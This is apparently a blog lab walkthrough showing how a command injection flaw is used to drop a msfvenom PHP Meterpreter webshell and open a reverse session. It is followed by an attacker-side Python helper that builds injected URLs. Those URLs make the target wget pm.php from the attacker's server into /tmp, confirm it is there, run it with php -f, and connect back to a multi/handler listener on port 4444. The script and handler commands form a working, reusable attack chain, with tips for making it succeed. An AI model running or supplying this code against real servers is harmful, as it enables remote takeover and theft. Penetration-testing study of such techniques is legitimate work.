Friday, April 13, 2018

Command Injection (IV): Webshell -> Msfvenom / Meterpreter

- Layout for this exercise:

- This exercise is based on the previous one:

- The goal of this exercise is to achieve a Meterpreter session by injecting a PHP webshell generated with msfvenom: the commands that fetch and run it are injected from the attacker's browser URL bar, through the command injection vulnerability of the previous exercise.

- First of all, let's have a look at the options of the PHP Meterpreter reverse_tcp payload available in Metasploit:

- The only required option is LHOST, the attacker's IP that the payload will connect back to (LPORT defaults to 4444).

- Based on this payload, msfvenom generates the webshell pm.php:

- Opening the file, the two characters /* that msfvenom puts in front of <?php must be removed for the PHP script to run properly:

- At the attacker's side, let's start a SimpleHTTPServer listening on port 8000 in the folder that contains pm.php, so that the target can download it:

- Now it is time to launch the attack: the injected command is wget, with -O giving the path of the output file, in this case /tmp/pm.php (note that -O names a file, not a folder; -P would set the destination folder).

- Why /tmp? Because it is world-writable on most systems, which sidesteps the problem of finding a location on disk where the web server's user is allowed to store the malicious webshell pm.php:

- At the attacker's side, the SimpleHTTPServer log registers the successful GET request for pm.php:

- Also, from Kali the attacker can check that this phase of the attack went well by listing /tmp through the same injection and locating the transferred webshell pm.php:

- Before running the webshell, let's open a listener at the attacker's side (LHOST on port 4444) with Metasploit's multi/handler, set to the same payload msfvenom used:

- Finally, the webshell pm.php is executed by injecting php -f /tmp/pm.php:

- The attack is successful: as soon as the webshell runs, the target's PHP interpreter connects back to the handler and a Meterpreter session is opened:
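The three injected requests above (stage the file with wget, verify it landed, run it with php -f) plus the handler setup, collected into one attacker-side helper. This is an added example, not code from the original post. The post does not show the vulnerable URL of the previous exercise, so the target endpoint, the parameter name `ip`, the `;` separator, the attacker IP 10.0.0.5 and the payload name `php/meterpreter/reverse_tcp` are all assumptions; the msfvenom output sample is constructed and shortened.

```python
"""Attacker-side helper for the staged PHP Meterpreter delivery described above.

Added example, not code from the original post. Target details are assumptions:
the post does not show the vulnerable URL, so a hypothetical GET parameter
``ip`` on ``vuln.php`` and a ``;`` command separator are used.
"""
from typing import List
from urllib.parse import urlencode

ATTACKER_IP = "10.0.0.5"                   # hypothetical LHOST
ATTACKER_PORT = 8000                       # SimpleHTTPServer port used in the post
TARGET = "http://target.example/vuln.php"  # hypothetical vulnerable endpoint
PARAM = "ip"                               # hypothetical injectable parameter
SEPARATOR = ";"                            # hypothetical; '&&', '|' or '%0a' may be needed
DROP_PATH = "/tmp/pm.php"                  # /tmp: usually world-writable

# Constructed, shortened stand-in for the first bytes of msfvenom's raw PHP
# output; the real pm.php is much longer.
SAMPLE_MSFVENOM_OUTPUT = "/*<?php /**/ error_reporting(0); $ip = '10.0.0.5'; $port = 4444;"


def strip_comment_guard(php_source: str) -> str:
    """Drop the leading '/*' that msfvenom puts in front of '<?php'.

    The post removes these two characters by hand; doing it in code avoids
    a typo that would stop the script from running properly.
    """
    source = php_source.lstrip()
    if source.startswith("/*<?php"):
        source = source[2:]
    return source


def inject(command: str, legit_value: str = "127.0.0.1") -> str:
    """Return the URL that appends `command` to a harmless-looking value.

    urlencode() percent-encodes ';', '/', ':' and spaces, which is what the
    browser does on submit and what keeps the parameter intact server-side.
    """
    payload = f"{legit_value}{SEPARATOR} {command}"
    return f"{TARGET}?{urlencode({PARAM: payload})}"


def stage_url() -> str:
    """Step 1: make the server fetch the webshell into a writable directory.
    wget -O takes an output *file*, so the full path is given, not just /tmp."""
    return inject(f"wget http://{ATTACKER_IP}:{ATTACKER_PORT}/pm.php -O {DROP_PATH}")


def verify_url() -> str:
    """Step 2: confirm the drop landed before touching the handler."""
    return inject(f"ls -l {DROP_PATH}")


def trigger_url() -> str:
    """Step 3: run the webshell with the php CLI; it connects back to LHOST:4444.
    php -f only reads the file, so a noexec-mounted /tmp does not stop this."""
    return inject(f"php -f {DROP_PATH}")


def handler_commands(lport: int = 4444) -> List[str]:
    """msfconsole lines for the listener that must be running before step 3.
    The payload name is assumed to match what msfvenom generated."""
    return [
        "use exploit/multi/handler",
        "set PAYLOAD php/meterpreter/reverse_tcp",
        f"set LHOST {ATTACKER_IP}",
        f"set LPORT {lport}",
        "run",
    ]


if __name__ == "__main__":
    print(strip_comment_guard(SAMPLE_MSFVENOM_OUTPUT)[:30])
    for url in (stage_url(), verify_url(), trigger_url()):
        print(url)
    print("\n".join(handler_commands()))
```

Two practical points the script encodes: the listener has to be up before the trigger request is sent, because the PHP process connects back immediately and exits if nothing answers; and the staging step depends on the web server's user being allowed to reach the attacker's port 8000 and to write to /tmp, so the verify step is worth keeping rather than assuming wget succeeded.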